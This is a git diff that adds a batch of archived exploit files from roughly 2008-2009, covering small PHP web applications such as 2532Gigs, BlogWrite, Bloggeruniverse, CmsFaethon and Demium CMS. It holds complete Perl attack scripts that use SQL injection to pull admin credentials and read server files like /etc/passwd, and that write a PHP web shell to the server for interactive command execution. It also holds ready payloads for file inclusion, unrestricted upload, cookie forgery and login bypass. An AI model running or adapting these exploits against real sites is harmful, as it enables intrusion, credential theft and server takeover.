diff --git a/2532Gigs 1.2.2 Stable - Multiple Vulnerabilities.txt b/2532Gigs 1.2.2 Stable - Multiple Vulnerabilities.txt new file mode 100644 index 0000000..2e995dd --- /dev/null +++ b/2532Gigs 1.2.2 Stable - Multiple Vulnerabilities.txt @@ -0,0 +1,96 @@ +[START] + +######################################################################################### +[0x01] Informations: + +Script : 2532|Gigs v1.2 Stable +Download : http://www.hotscripts.com/jump.php?listing_id=65863&jump_type=1 +Dork : Powered by 2532|Gigs v1.2.2 +Vulnerability : Local File Inclusion / Remote File Upload +Author : Osirys +Contact : osirys[at]live[dot]it +Website : http://osirys.org +Notes : Proud to be Italian +Greets: : XaDoS, x0r, emgent, Jay, str0ke, Todd and AlpHaNiX + + +######################################################################################### +[0x02] Bug: [Multiple Local File Inclusions] +###### + +Bugged file is: /[path]/settings.php +Bugged file is: /[path]/deleteuser.php +Bugged file is: /[path]/mini_calendar.php +Bugged file is: /[path]/manage_venues.php +Bugged file is: /[path]/manage_gigs.php + +* There are a lot of other files vulnerable to LFI ! + +[CODE] + + $language + +[!] FIX: Declare $language var. + + +[!] EXPLOIT: /[path]/settings.php?language=[local_file_to_include] +[!] EXPLOIT: /[path]/deleteuser.php?language=[local_file_to_include] +[!] EXPLOIT: /[path]/mini_calendar?language=[local_file_to_include] +[!] EXPLOIT: /[path]/manage_venues.php?language=[local_file_to_include] +[!] EXPLOIT: /[path]/manage_gigs.php?language=[local_file_to_include] + ../../../../../../../../../../etc/passwd%00 + + +######################################################################################### +[0x03] Bug: [Remote File Upload] +###### + +Bugged file is: /[path]/upload_flyer.php + +[CODE] + +if (isset($_POST['submitflyer'])) + { + if (strlen($_FILES['banner']['name']) > 0) +{ +$target = "flyers/".$_FILES['banner']['name']; +move_uploaded_file($_FILES['banner']['tmp_name'], $target); + +// Other code, like it cheeks if /[path]/flyers dir is writable or not ! + +[/CODE] + +As we can see, everyone can upload everything that he wants. There is not login required, +and there isn't a cheek for the extension of the file that is going to be uploaded. +So, an unregistered user can upload a file of any extension, like a .php file. Why not +a php shell ? + +[!] FIX: Before the upload script, just cheek if the user is registered, and then allow him + only to upload .gif/jpg or the extension you want, not .php or other extensions ! + + +[!] EXPLOIT: + 1) Go to: /path/upload_flyer.php + 2) Select your local file to upload + 3) Press submit button + 4) Cheek your file at: /[path]/flyers/your_local_file.your_extension + + +######################################################################################### + +[/END] + +# milw0rm.com [2008-12-18] + \ No newline at end of file diff --git a/BlogWrite 0.91 - Remote File Disclosure SQL Injection.pl b/BlogWrite 0.91 - Remote File Disclosure SQL Injection.pl new file mode 100644 index 0000000..6faf152 --- /dev/null +++ b/BlogWrite 0.91 - Remote File Disclosure SQL Injection.pl @@ -0,0 +1,214 @@ +#!/usr/bin/perl + +# |----------------------------------------------------------------------------------------------------------------------------------| +# | INFORMATIONS | +# |----------------------------------------------------------------------------------------------------------------------------------| +# |Web Application : BlogWrite 0.91 +# |Download : Can't remember 0o +# |----------------------------------------------------------------------------------------------------------------------------------| +# |Remote FD / SQL Injection Exploit | +# |by Osirys | +# |osirys[at]autistici[dot]org | +# |osirys.org | +# |Greets to: evilsocket, Fireshot, Todd and str0ke | +# |----------------------------------------------------------------------------------------------------------------------------------| +# |BUG [Sql Injection] +# | p0c : /[path]/print.php?id=[sql_string] +# |SQL Injections used by this sploit : +# |[1] /path]/print.php?id=-1' union all select 1,2,concat(user,0x3a,pass),4,5,6,0,8 from auth where id='1 +# |[2] /path]/print.php?id=-1' union all select 1,2,load_file('lf'),4,5,6,0,8 from auth where id='1 +# |----------------------------------------------------------------------------------------------------------------------------------| +# |No into dumpfile function, cos query is protected, had not been able to bypass it ! +# |----------------------------------------------------------------------------------------------------------------------------------| + +# -----------------------------------------------------------------------------------------------------------------------------------| +# Exploit in action [>!] +# -----------------------------------------------------------------------------------------------------------------------------------| +# osirys[~]>$ perl sql3.txt http://localhost/blogwrite-0.91/ admin_hash +# +# -------------------------------------- +# Blogwrite FD / SQL Inj Exploit +# Coded by Osirys +# ------------------------------------- + +# [*] Extracting admin credentials via Sql Injection .. +# [*] Username: admin +# [*] Password: password +# +# osirys[~]>$ +# -----------------------------------------------------------------------------------------------------------------------------------| +# osirys[~]>$ perl sql3.txt http://localhost/blogwrite-0.91/ file_disc +# +# -------------------------------------- +# Blogwrite FD / SQL Inj Exploit +# Coded by Osirys +# ------------------------------------- + +# [*] cat /etc/passwd +# root:x:0:0::/root:/bin/bash +# bin:x:1:1:bin:/bin:/bin/false +# daemon:x:2:2:daemon:/sbin:/bin/false +# adm:x:3:4:adm:/var/log:/bin/false +# lp:x:4:7:lp:/var/spool/lpd:/bin/false +# sync:x:5:0:sync:/sbin:/bin/sync +# shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown +# halt:x:7:0:halt:/sbin:/sbin/halt +# mail:x:8:12:mail:/:/bin/false +# news:x:9:13:news:/usr/lib/news:/bin/false +# uucp:x:10:14:uucp:/var/spool/uucppublic:/bin/false +# operator:x:11:0:operator:/root:/bin/bash +# games:x:12:100:games:/usr/games:/bin/false +# ftp:x:14:50::/home/ftp:/bin/false +# smmsp:x:25:25:smmsp:/var/spool/clientmqueue:/bin/false +# mysql:x:27:27:MySQL:/var/lib/mysql:/bin/false +# rpc:x:32:32:RPC portmap user:/:/bin/false +# sshd:x:33:33:sshd:/:/bin/false +# gdm:x:42:42:GDM:/var/state/gdm:/bin/bash +# apache:x:80:80:User for Apache:/srv/httpd:/bin/false +# messagebus:x:81:81:User for D-BUS:/var/run/dbus:/bin/false +# haldaemon:x:82:82:User for HAL:/var/run/hald:/bin/false +# pop:x:90:90:POP:/:/bin/false +# nobody:x:99:99:nobody:/:/bin/false +# osirys:x:1000:100:Giovanni,,,:/home/osirys:/bin/bash +# +# [*] cat exit +# [-] Quitting .. +# osirys[~]>$ +# -----------------------------------------------------------------------------------------------------------------------------------| + + +use LWP::UserAgent; +use HTTP::Request::Common; + + +my $host = $ARGV[0]; +my $expl = $ARGV[1]; + +my $sql_inj_path = "/print.php?id="; +my $gen_sql_inj = "-1' union all select 1,2,"; + +($host,$expl) || help("-1"); +cheek($host,$expl) == 1 || help("-2"); +&banner; + +$datas = get_input($host); +$datas =~ /(.*) (.*)/; +($h0st,$path) = ($1,$2); + +&adm_hash if $expl_way == 1; +&file_discl if $expl_way == 2; + +sub adm_hash { + print "[*] Extracting admin credentials via Sql Injection ..\n"; + my $attack = $host.$sql_inj_path.$gen_sql_inj."concat(0x64657461696C73,user,0x3a,pass,0x64657461696C73),4,5,6,0,8 from auth where id='1"; + my $re = get_req($attack); + if ($re =~ /details(.+):(.+)details/) { + print "[*] Username: $1\n"; + print "[*] Password: $2\n\n"; + exit(0); + } + else { + print "[-] Can't extract admin credentials\n[-] Exploit Failed !\n\n"; + exit(0); + } +} + +sub file_discl { + print "[*] cat "; + my $file = ; + chomp($file); + $file !~ /exit/ || die "[-] Quitting ..\n"; + if ($file !~ /\/(.*)/) { + print "\n[-] Bad filename !\n"; + &file_discl; + } + my $attack = $host.$sql_inj_path.$gen_sql_inj."load_file('".$file."'),4,5,6,0,8 from auth where id='1"; + my $re = get_req($attack); + my $content = tag($re); + if ($content =~ /<\/b><\/div>

(.+)<\/p>

/) { + my $out = $1; + $out =~ s/\$/ /g; + $out =~ s/\*/\n/g; + $out =~ s/$out/$out\n/ if ($out !~ /\n$/); + print "$out\n"; + &file_discl; + } + else { + $c++; + print "[-] Can't find ".$file." \n"; + $c < 3 || die "[-] File Disclosure failed !\n[-] Something wrong. Exploit Failed !\n\n"; + &file_discl; + } +} + +sub get_req() { + $link = $_[0]; + my $req = HTTP::Request->new(GET => $link); + my $ua = LWP::UserAgent->new(); + $ua->timeout(4); + my $response = $ua->request($req); + return $response->content; +} + +sub get_input() { + my $host = $_[0]; + $host =~ /http:\/\/(.*)/; + $s_host = $1; + $s_host =~ /([a-z.-]{1,30})\/(.*)/; + ($h0st,$path) = ($1,$2); + $path =~ s/(.*)/\/$1/; + $full_det = $h0st." ".$path; + return $full_det; +} + +sub tag() { + my $string = $_[0]; + $string =~ s/ /\$/g; + $string =~ s/\s/\*/g; + return($string); +} + +sub cheek() { + my $host = $_[0]; + my $expl = $_[1]; + if ($host =~ /http:\/\/(.*)/) { + $ch_host = 1; + } + if ($expl =~ /admin_hash/) { + $ch_expl = 1; + $expl_way = 1; + } + elsif ($expl =~ /file_disc/) { + $ch_expl = 1; + $expl_way = 2; + } + return 1 if ((($ch_host)&&($ch_expl)) == 1); + &help("-2"); +} + +sub banner { + print "\n". + " --------------------------------------\n". + " Blogwrite FD / SQL Inj Exploit \n". + " Coded by Osirys \n". + " ------------------------------------- \n\n"; +} + +sub help() { + my $error = $_[0]; + if ($error == -1) { + &banner; + print "\n[-] Input Error, missed some arguments !\n\n"; + } + elsif ($error == -2) { + &banner; + print "\n[-] Bad arguments !\n\n"; + } + print "[*] Usage : perl $0 http://hostname/cms_path admin_hash\n"; + print " Ex: perl $0 http://site.it/cms/ admin_hash\n"; + print "[*] Usage : perl $0 http://hostname/cms_path file_disc\n"; + print " Ex: perl $0 http://site.it/cms/ file_disc\n"; + exit(0); +} + +# milw0rm.com [2009-02-13] \ No newline at end of file diff --git a/Bloggeruniverse 2.0 Beta - SQL Injection.pl b/Bloggeruniverse 2.0 Beta - SQL Injection.pl new file mode 100644 index 0000000..8e6b6b6 --- /dev/null +++ b/Bloggeruniverse 2.0 Beta - SQL Injection.pl @@ -0,0 +1,249 @@ +#!/usr/bin/perl + +# |----------------------------------------------------------------------------------------------------------------------------------| +# | INFORMATIONS | +# |----------------------------------------------------------------------------------------------------------------------------------| +# |Web Application : Bloggeruniverse v2Beta | +# |Download : http://garr.dl.sourceforge.net/sourceforge/bloggeruniverse/bloggeruniverse-beta2.zip | +# |----------------------------------------------------------------------------------------------------------------------------------| +# |Remote Exploit (Admin credentials extract + File Disclosure + Remote Command Execution via Sql Injection) | +# |by Osirys | +# |osirys[at]autistici[dot]org | +# |osirys.org | +# |Greets to: evilsocket, Fireshot, Todd and str0ke | +# |----------------------------------------------------------------------------------------------------------------------------------| +# |BUG [Sql Injection] +# | p0c : /[path]/editcomments.php?id=[sql_string] +# | There are other sql injections, find them by yourself ;) +# |[!] This Blog system doesn't cheek if install.php file still exists after installation ! ;) +# |SQL Injections used by this sploit : +# |[1] /path]/editcomments.php?id=-2 union all select 1,2,3,4,5,6,concat(username,0x3a,password),8 from users +# |[2] /path]/editcomments.php?id=-2 union all select 1,2,3,4,5,6,load_file('lf'),8 +# |[3] /path]/editcomments.php?id=-2 union all select 1,2,3,4,5,6,'content',8 into dumpfile 'path' +# |----------------------------------------------------------------------------------------------------------------------------------| +# |This CMS is vulnerable to sql injection. This simple exploit just uses the sql bug to get admin credentials (username,password), +# |uses load_file() mysql function to disclosure local file on the server, uses the '' into dumpfile '' mysql function to save a +# |php shell on the website, so it will allows you to execute commands. +# |The RCE way is more difficult, becouse you need to know the site's path on the server, dumpfile function needs it ! +# |I'm trying to find an universal way to find the cwd of the site in the server from sql injection, still nothing. Would be good a +# |LFI bug, so then we could write our file into /tmp, and then include it via LFI. +# |----------------------------------------------------------------------------------------------------------------------------------| + +# Pastin' here output of all exploiting way of this sploit will be too long, here the first way : Admin credentials extract +# -----------------------------------------------------------------------------------------------------------------------------------| +# Exploit in action [>!] +# -----------------------------------------------------------------------------------------------------------------------------------| +# osirys[~]>$ perl p0w.txt http://localhost/bloggeruniverse-beta2/ admin_hash +# +# -------------------------------------- +# Bloggeruniverse Remote Exploit +# Coded by Osirys +# ------------------------------------- +# +# [*] Extracting admin credentials via Sql Injection .. +# [*] Username: admin +# [*] Password: 5f4dcc3b5aa765d61d8327deb882cf99 +# +# osirys[~]> +# -----------------------------------------------------------------------------------------------------------------------------------| + +use LWP::UserAgent; +use HTTP::Request::Common; + +my $host = $ARGV[0]; +my $expl = $ARGV[1]; +my $fpath = $ARGV[2]; + +my $sql_inj_path = "/editcomments.php?id="; +my $gen_sql_inj = "-2 union all select 1,2,3,4,5,6,"; +my $php_c0de = ""; + +$fpath = "/x" if ($expl =~ /file_disc/); +$fpath = "/x" if ($expl =~ /admin_hash/); +($host,$expl,$fpath) || help("-1"); +cheek($host,$expl,$fpath) == 1 || help("-2"); +&banner; + +$datas = get_input($host); +$datas =~ /(.*) (.*)/; +($h0st,$path) = ($1,$2); + +&adm_hash if $expl_way == 1; +&file_discl if $expl_way == 2; +&cmd if $expl_way == 3; + +sub adm_hash { + print "[*] Extracting admin credentials via Sql Injection ..\n"; + my $sql_inj = $sql_inj_path.$gen_sql_inj."concat(username,0x3a,password),8 from users"; + my $attack = $host.$sql_inj; + my $re = get_req($attack); + my $content = tag($re); + if ($content =~ /name="comment">([a-zA-Z0-9-_.]{2,15}):([a-f0-9]{32})<\/textarea>/) { + print "[*] Username: $1\n"; + print "[*] Password: $2\n\n"; + exit(0); + } + else { + print "[-] Can't extract admin credentials\n[-] Exploit Failed !\n\n"; + exit(0); + } +} + +sub file_discl { + print "[*] cat "; + my $file = ; + chomp($file); + $file !~ /exit/ || die "[-] Quitting ..\n"; + if ($file !~ /\/(.*)/) { + print "\n[-] Bad filename !\n"; + &file_discl; + } + my $sql_inj = $sql_inj_path.$gen_sql_inj."load_file(\"".$file."\"),8"; + my $attack = $host.$sql_inj; + my $re = get_req($attack); + my $content = tag($re); + if ($content =~ /name="comment">(.+)<\/textarea>\*\*\*\*\*\*<\/td>/) { + my $out = $1; + $out =~ s/\$/ /g; + $out =~ s/\*/\n/g; + $out =~ s/$out/$out\n/ if ($out !~ /\n$/); + print "$out\n"; + &file_discl; + } + elsif ($content =~ /name="comment"><\/textarea>\*\*\*\*\*\*<\/td>/) { + $c++; + print "[-] Can't find ".$file." \n"; + $c < 3 || die "[-] File Disclosure failed !\n[-] Something wrong. Exploit Failed !\n\n"; + &file_discl; + } +} + +sub cmd { + print "[*] Injectin php shell via Sql Injection\n"; + my $sql_inj = $sql_inj_path.$gen_sql_inj."'".$php_c0de."',8 into dumpfile '".$fpath."/shell.php'"; + my $attack = $host.$sql_inj; + get_req($attack); + my $test = get_req($host."shell.php"); + if ($test =~ /st4rt/) { + print "[*] Shell succesfully injected !\n"; + print "[&] Hi my master, do your job now [!]\n\n"; + $exec_path = $host."/shell.php"; + &exec_cmd; + } + else { + print "[-] Shell not found \n[-] Exploit failed\n\n"; + exit(0); + } +} + +sub exec_cmd() { + $h0st !~ /www\./ || $h0st =~ s/www\.//; + print "shell[$h0st]\$> "; + my $cmd = ; + $cmd !~ /exit/ || die "[-] Quitting ..\n"; + my $exec_url = $exec_path."?cmd=".$cmd; + my $re = get_req($exec_url); + my $content = tag($re); + if ($content =~ /st4rt(.+)8/) { + my $out = $1; + $out =~ s/\$/ /g; + $out =~ s/\*/\n/g; + $out =~ s/8//g; + chomp($out); + print "$out\n"; + &exec_cmd; + } + else { + $c++; + $cmd =~ s/\n//; + print "bash: ".$cmd.": command not found\n"; + $c < 3 || die "[-] Command are not executed.\n[-] Something wrong. Exploit Failed !\n\n"; + &exec_cmd; + } + +} + +sub get_req() { + $link = $_[0]; + my $req = HTTP::Request->new(GET => $link); + my $ua = LWP::UserAgent->new(); + $ua->timeout(4); + my $response = $ua->request($req); + return $response->content; +} + +sub get_input() { + my $host = $_[0]; + $host =~ /http:\/\/(.*)/; + $s_host = $1; + $s_host =~ /([a-z.-]{1,30})\/(.*)/; + ($h0st,$path) = ($1,$2); + $path =~ s/(.*)/\/$1/; + $full_det = $h0st." ".$path; + return $full_det; +} + +sub tag() { + my $string = $_[0]; + $string =~ s/ /\$/g; + $string =~ s/\s/\*/g; + return($string); +} + +sub cheek() { + my $host = $_[0]; + my $expl = $_[1]; + my $fpath = $_[2]; + if ($host =~ /http:\/\/(.*)/) { + $ch_host = 1; + } + if ($expl =~ /admin_hash/) { + $ch_expl = 1; + $ch_fpath = 1; + $expl_way = 1; + } + elsif ($expl =~ /file_disc/) { + $ch_expl = 1; + $ch_fpath = 1; + $expl_way = 2; + } + elsif ($expl =~ /cmd/) { + $ch_expl = 1; + $expl_way = 3; + } + if ($fpath =~ /\/(.*)/) { + $ch_fpath = 1; + } + return 1 if ((($ch_host)&&($ch_expl)&&($ch_fpath)) == 1); + &help("-2"); +} + +sub banner { + print "\n". + " --------------------------------------\n". + " Bloggeruniverse Remote Exploit \n". + " Coded by Osirys \n". + " ------------------------------------- \n\n"; +} + +sub help() { + my $error = $_[0]; + if ($error == -1) { + &banner; + print "\n[-] Input Error, missed some arguments !\n\n"; + } + elsif ($error == -2) { + &banner; + print "\n[-] Bad arguments !\n\n"; + } + print "[*] Usage : perl $0 http://hostname/cms_path admin_hash\n"; + print " Ex: perl $0 http://site.it/cms/ admin_hash\n"; + print "[*] Usage : perl $0 http://hostname/cms_path file_disc\n"; + print " Ex: perl $0 http://site.it/cms/ file_disc\n"; + print "[*] Usage : perl $0 http://hostname/cms_path cmd path_of_site\n"; + print " Ex: perl $0 http://site.it/cms/ cmd /home/osirys/web/cms/\n\n"; + exit(0); +} + +# milw0rm.com [2009-02-11] \ No newline at end of file diff --git a/Butterfly ORGanizer 2.0.1 SQL Injection.txt b/Butterfly ORGanizer 2.0.1 SQL Injection.txt new file mode 100644 index 0000000..5e01900 --- /dev/null +++ b/Butterfly ORGanizer 2.0.1 SQL Injection.txt @@ -0,0 +1,35 @@ +######################################################################################### +[0x01] Informations: + +Name : Butterfly Organizer 2.0.1 Sql Injection +Download : http://www.hotscripts.com/jump.php?listing_id=72677&jump_type=1 +Vulnerability : Remote Sql Injection +Author : Osirys +Contact : osirys[at]live[dot]it +Notes : Proud to be Italian +* : Same bug of the previous version: http://milw0rm.com/exploits/5797 + +######################################################################################### +[0x02] Bug: + +Bugged file is /[path]/view.php + +[CODE] +$mytable = $_GET['mytable']; +$id = $_GET['id']; + +$result = mysql_query("SELECT * FROM ".$mytable." WHERE id=$id",$database); +$myrow = mysql_fetch_array($result); +[/CODE] + +Query accept direct GET input, so we can inject hell sql code. +To avoid this vulnerability, just escape GET input. + +######################################################################################### +[0x03] Exploit: + +http://localhost/[path]/view.php?id=-1+union+select+0x49276d2076756c6e657261626c65203a28,2,3,name,url,username,password,8,9,10+from+test_category&mytable=test_category + +######################################################################################## + +# milw0rm.com [2008-12-10] \ No newline at end of file diff --git a/Calendar Script 1.1 - Insecure Cookie Handling.txt b/Calendar Script 1.1 - Insecure Cookie Handling.txt new file mode 100644 index 0000000..f4bc8c7 --- /dev/null +++ b/Calendar Script 1.1 - Insecure Cookie Handling.txt @@ -0,0 +1,53 @@ +[START] + +######################################################################################### +[0x01] Informations: + +Script : Calendar Script v1.1 +Download : http://www.hotscripts.com/jump.php?listing_id=71365&jump_type=1 +Vulnerability : Insecure Cookie Handling +Author : Osirys +Contact : osirys[at]live[dot]it +Website : http://osirys.org +Notes : Proud to be Italian +Greets: : XaDoS, x0r, emgent, Jay, str0ke, Todd and AlpHaNiX + + +######################################################################################### +[0x02] Bug: [Insecure Cookie Handling] +###### + +Bugged file is: /[path]/index.php + +[CODE] + +if(mysql_num_rows($checkDetails) > 0) { + setcookie('nodstrumCalendarV2', '1', time()+3600); // Cookie will expire in 1 hour. + // $loginMsg = 'You are logged in!'; +} + +[/CODE] + +If we login in correctly, a cookie is created with 'nodstrumCalendarV2' as name and +'1' as content. + +## [!] FIX: Change name or content to the cookie. Example: + +[CODE] + +if(mysql_num_rows($checkDetails) > 0) { + setcookie('nodstrumCalendarV2', '$password', time()+3600); // Cookie will expire in 1 hour. + // $loginMsg = 'You are logged in!'; +} + +[/CODE] + + +### [!] EXPLOIT: javascript:document.cookie = "nodstrumCalendarV2=1; path=/"; + + +######################################################################################### + +[/END] + +# milw0rm.com [2008-12-18] \ No newline at end of file diff --git a/CmsFaethon 2.2.0 - SQL Injection.pl b/CmsFaethon 2.2.0 - SQL Injection.pl new file mode 100644 index 0000000..e46a4c0 --- /dev/null +++ b/CmsFaethon 2.2.0 - SQL Injection.pl @@ -0,0 +1,238 @@ +#!/usr/bin/perl + +# |----------------------------------------------------------------------------------------------------------------------------------| +# | INFORMATIONS | +# |----------------------------------------------------------------------------------------------------------------------------------| +# |Web Application : CmsFaethon 2.2.0 Ultimate | +# |Download : http://garr.dl.sourceforge.net/sourceforge/cmsfaethon/cmsfaethon-2.2.0-ultimate.zip | +# |----------------------------------------------------------------------------------------------------------------------------------| +# |Remote SQL Command Injection Exploit | +# |by Osirys | +# |osirys[at]autistici[dot]org | +# |osirys.org | +# |Greets to: evilsocket, Fireshot, Todd and str0ke | +# |----------------------------------------------------------------------------------------------------------------------------------| +# |BUG [Sql Injection] +# | p0c : /[path]/info.php?item=[sql_string] +# |SQL Injections used by this sploit : +# |[1] /path]/info.php?item=-2' union all select concat(username,0x3a,password),0 from f06_users order by '* +# |[2] /path]/info.php?item=-2' union all select load_file('lf'),0 order by '* +# |[3] /path]/info.php?item=-2' union all select 'content',0 into dumpfile 'file +# |----------------------------------------------------------------------------------------------------------------------------------| +# |This exploit just use a trick that came in my mind smocking a cigarette. It's just a SQL Injection vulnerability, but with this +# |trick can become a RCE vulnerability. A lot of people already know the into dumpfile mysql function, but this function needs the +# |path of the site in the server, so the attacker has to find this path to perform a RCE attack. +# |I just found a possible way to find this path. Making a HTTP GET request to a non existent file of the cms, this wrong request will +# |appear into error log files. So, just using then load_file() function on each possible path of error logs, when we will find the +# |right path, will appear error log's content, so we will be able to get the website path in the server just watching near the error +# |that came out after the request to a non existent file. Anyway, soon I will write a paper to talk about this trick. +# |It's just an experimental way to RCE by SQL. Can be emproved. A complete paper will arrive soon ! +# |Coz to use this technique you need to know few things before :P +# |----------------------------------------------------------------------------------------------------------------------------------| + +# -----------------------------------------------------------------------------------------------------------------------------------| +# Exploit in action [>!] +# -----------------------------------------------------------------------------------------------------------------------------------| +# osirys[~]>$ perl p0w.txt http://localhost/cmsfaethon-2.0.4-ultimate/20_ultimate/ +# +# --------------------------------- +# CmsFaethon Remote SQL +# CMD Inj Sploit +# by Osirys +# --------------------------------- +# +# [*] Getting admin login details .. +# [$] User: admin +# [$] Pass: 5f4dcc3b5aa765d61d8327deb882cf99 +# [*] Generating error through GET request .. +# [*] Cheeking Apache Error Log path .. +# [*] Error Log path found -> /var/log/httpd/error_log +# [*] Website path found -> /home/osirys/web/cmsfaethon-2.0.4-ultimate/20_ultimate/ +# [*] Shell succesfully injected ! +# [&] Hi my master, do your job now [!] + +# shell[localhost]$> id +# uid=80(apache) gid=80(apache) groups=80(apache) +# shell[localhost]$> pwd +# /home/osirys/web/cmsfaethon-2.0.4-ultimate/20_ultimate +# shell[localhost]$> exit +# [-] Quitting .. +# osirys[~]>$ +# -----------------------------------------------------------------------------------------------------------------------------------| + + +use IO::Socket; +use LWP::UserAgent; + +my $host = $ARGV[0]; +my $rand = int(rand 9) +1; + +my @error_logs = qw( + /var/log/httpd/error.log + /var/log/httpd/error_log + /var/log/apache/error.log + /var/log/apache/error_log + /var/log/apache2/error.log + /var/log/apache2/error_log + /logs/error.log + /var/log/apache/error_log + /var/log/apache/error.log + /usr/local/apache/logs/error_log + /etc/httpd/logs/error_log + /etc/httpd/logs/error.log + /var/www/logs/error_log + /var/www/logs/error.log + /usr/local/apache/logs/error.log + /var/log/error_log + /apache/logs/error.log + ); + +my $php_c0de = ""; + +($host) || help("-1"); +cheek($host) == 1 || help("-2"); +&banner; + +$datas = get_input($host); +$datas =~ /(.*) (.*)/; +($h0st,$path) = ($1,$2); + +print "[*] Getting admin login details ..\n"; + +my $url = $host."/info.php?item=-2' union all select concat(0x64657461696C73,username,0x3a,password,0x64657461696C73),0 from f06_users order by '*"; +my $re = get_req($url); +if ($re =~ /details(.+):(.+)details/) { + $user = $1; + $pass = $2; + print "[\$] User: $user\n"; + print "[\$] Pass: $pass\n"; +} +else { + print "[-] Can't extract admin details\n\n"; +} + +print "[*] Generating error through GET request ..\n"; + +get_req($host."/osirys_log_test".$rand); + +print "[*] Cheeking Apache Error Log path ..\n"; + +while (($log = <@error_logs>)&&($gotcha != 1)) { + $tmp_path = $host."/info.php?item=-2' union all select load_file('".$log."'),0 order by '*"; + $re = get_req($tmp_path); + if ($re =~ /File does not exist: (.+)\/osirys_log_test$rand/) { + $site_path = $1."/"; + $gotcha = 1; + print "[*] Error Log path found -> $log\n"; + print "[*] Website path found -> $site_path\n"; + &inj_shell; + } +} + +$gotcha == 1 || die "[-] Couldn't file error_log !\n"; + +sub inj_shell { + my $attack = $host."/info.php?item=-2' union all select '".$php_c0de."',0 into dumpfile '".$site_path."/1337.php"; + get_req($attack); + my $test = get_req($host."/1337.php"); + if ($test =~ /st4rt/) { + print "[*] Shell succesfully injected !\n"; + print "[&] Hi my master, do your job now [!]\n\n"; + $exec_path = $host."/shell.php"; + &exec_cmd; + + } + else { + print "[-] Shell not found \n[-] Exploit failed\n\n"; + exit(0); + } +} + +sub exec_cmd { + $h0st !~ /www\./ || $h0st =~ s/www\.//; + print "shell[$h0st]\$> "; + $cmd = ; + $cmd !~ /exit/ || die "[-] Quitting ..\n"; + $exec_url = $host."/1337.php?cmd=".$cmd; + my $re = get_req($exec_url); + my $content = tag($re); + if ($content =~ /st4rt(.+)0/) { + my $out = $1; + $out =~ s/\$/ /g; + $out =~ s/\*/\n/g; + chomp($out); + print "$out\n"; + &exec_cmd; + } + else { + $c++; + $cmd =~ s/\n//; + print "bash: ".$cmd.": command not found\n"; + $c < 3 || die "[-] Command are not executed.\n[-] Something wrong. Exploit Failed !\n\n"; + &exec_cmd; + } + +} + +sub get_req() { + $link = $_[0]; + my $req = HTTP::Request->new(GET => $link); + my $ua = LWP::UserAgent->new(); + $ua->timeout(4); + my $response = $ua->request($req); + return $response->content; +} + +sub cheek() { + my $host = $_[0]; + if ($host =~ /http:\/\/(.*)/) { + return 1; + } + else { + return 0; + } +} + +sub get_input() { + my $host = $_[0]; + $host =~ /http:\/\/(.*)/; + $s_host = $1; + $s_host =~ /([a-z.-]{1,30})\/(.*)/; + ($h0st,$path) = ($1,$2); + $path =~ s/(.*)/\/$1/; + $full_det = $h0st." ".$path; + return $full_det; +} + +sub tag() { + my $string = $_[0]; + $string =~ s/ /\$/g; + $string =~ s/\s/\*/g; + return($string); +} + +sub banner { + print "\n". + " --------------------------------- \n". + " CmsFaethon Remote SQL \n". + " CMD Inj Sploit \n". + " by Osirys \n". + " --------------------------------- \n\n"; +} + +sub help() { + my $error = $_[0]; + if ($error == -1) { + &banner; + print "\n[-] Input data failed ! \n"; + } + elsif ($error == -2) { + &banner; + print "\n[-] Bad hostname address !\n"; + } + print "[*] Usage : perl $0 http://hostname/cms_path\n\n"; + exit(0); +} + +# milw0rm.com [2009-02-13] diff --git a/Demium CMS 0.2.1b - Multiple Vulnerabilities.txt b/Demium CMS 0.2.1b - Multiple Vulnerabilities.txt new file mode 100644 index 0000000..2acec98 --- /dev/null +++ b/Demium CMS 0.2.1b - Multiple Vulnerabilities.txt @@ -0,0 +1,450 @@ +Demium CMS, version 0.2.1 Beta, is prone to multiple remote vulnerabilities, because of insufficient security on it. Let's see them. In this advisory +you can find vulnerabilities, afflicted source, and multiple Remote Exploit. + + +Credits to : Giovanni Buzzin, Osirys +Contact : osirys[at]autistici[dot]org +Website : http://osirys.org +Download : http://www.demium.de/ftp/archive/demium_beta_v.0.2.1.rar + + +[0x01 - Authority Bypass via Sql Injection] + + At first, it's vulnerable to Authority Bypass via Sql Injection. Needs Magic Quotes OFF to work, because CMS dosn't stripslash on + POST data. + + Vulnerable file is: /[path]/index_admin.php + [CODE] + $username = $_POST['user']; + $pw = md5($_POST['pw']); + $sql = "SELECT * FROM cms_profile WHERE profile_username = '$username' AND profile_password = '$pw' AND profile_aktiv=1;"; + $result = mysql_query($sql); + $failure=true; + while($row = mysql_fetch_assoc($result)) + { + $failure=false; + setcookie("login_pw", $pw, (time()+(60*60*24*365))); + setcookie("login_user", $username, (time()+(60*60*24*365))); + header("Location: /demium_beta_v.0.2.1//index_admin.php?loading=1"); + } + } + [/CODE] + + To exploit this vulnerability, and become Administrator, just put this in username form: admin_user' or '1=1 + Where admin_user is the real nickname of the Administrator, by default: admin. + +[/0x01] + +[0x02 - Remote SQL Injection] + + Multiple SQL Injection vulnerabilities found on this CMS. I just report the first one that I found. Needs Magic Quotes needs to be OFF + because this CMS doesn't stripslash on GET incoming data. + + Vulnerable file is: /[path]/tracking.php + [CODE] + + + + ' into outfile '/tmp/sh_spawn_ownz.txt + + Exploit #1 will produce a GET request to a non existing file, since after the exploit the remote user will be redirected to host/sql_output/.html + Testing this SQL Injection in local I got redirected to this URL: http://localhost/admin:5f4dcc3b5aa765d61d8327deb882cf99/.html , producing the classic: + The requested URL /admin:5f4dcc3b5aa765d61d8327deb882cf99/.html was not found on this server. + + Exploit #2 just create a file called "sh_spawn_ownz.txt" with "" as content, yes, a Remote Shell. With LFI vulnerability the remote user will + be able to include the created file and executes command. + + Exploit provided at the end of the adviosory. + + +[/0x02] + +[0x03 - Remote File Disclosure] + + It's also vulnerable to File Disclore, with a GET request a remote user is able to read files content. It's not a file inclusion, but a fread + of a local file. Let's see the vulnerable code. + + Vulnerable file is: /[path]/urheber.php + [CODE] + ", $contents); + echo $contents; + } + // Other code + [/CODE] + + $fname comes directly from GET, without been cheeked before. From get we can se it's value, and adding a NULL BYTE %00 a remote user will + be able to read the content of the selected file. + Attach example: /[path]/urheber.php?name=../content.php%00 + This request will show /[path]/content.php source code. + Attach example #2 : /[path]/urheber.php?name=../../../../../../../../../../etc/passwd%00 + +[/0x03] + +[0x04 - Local File Inclusion] + + This CMS, it's also affected to Local File Inclusion, a remote user will able to include and execute local file on the server. + I coded then a simple exploit to obtain a Remote Command Execution, creating a malicious file on the server, to include it then with the LFI. + + Vulnerable file is: 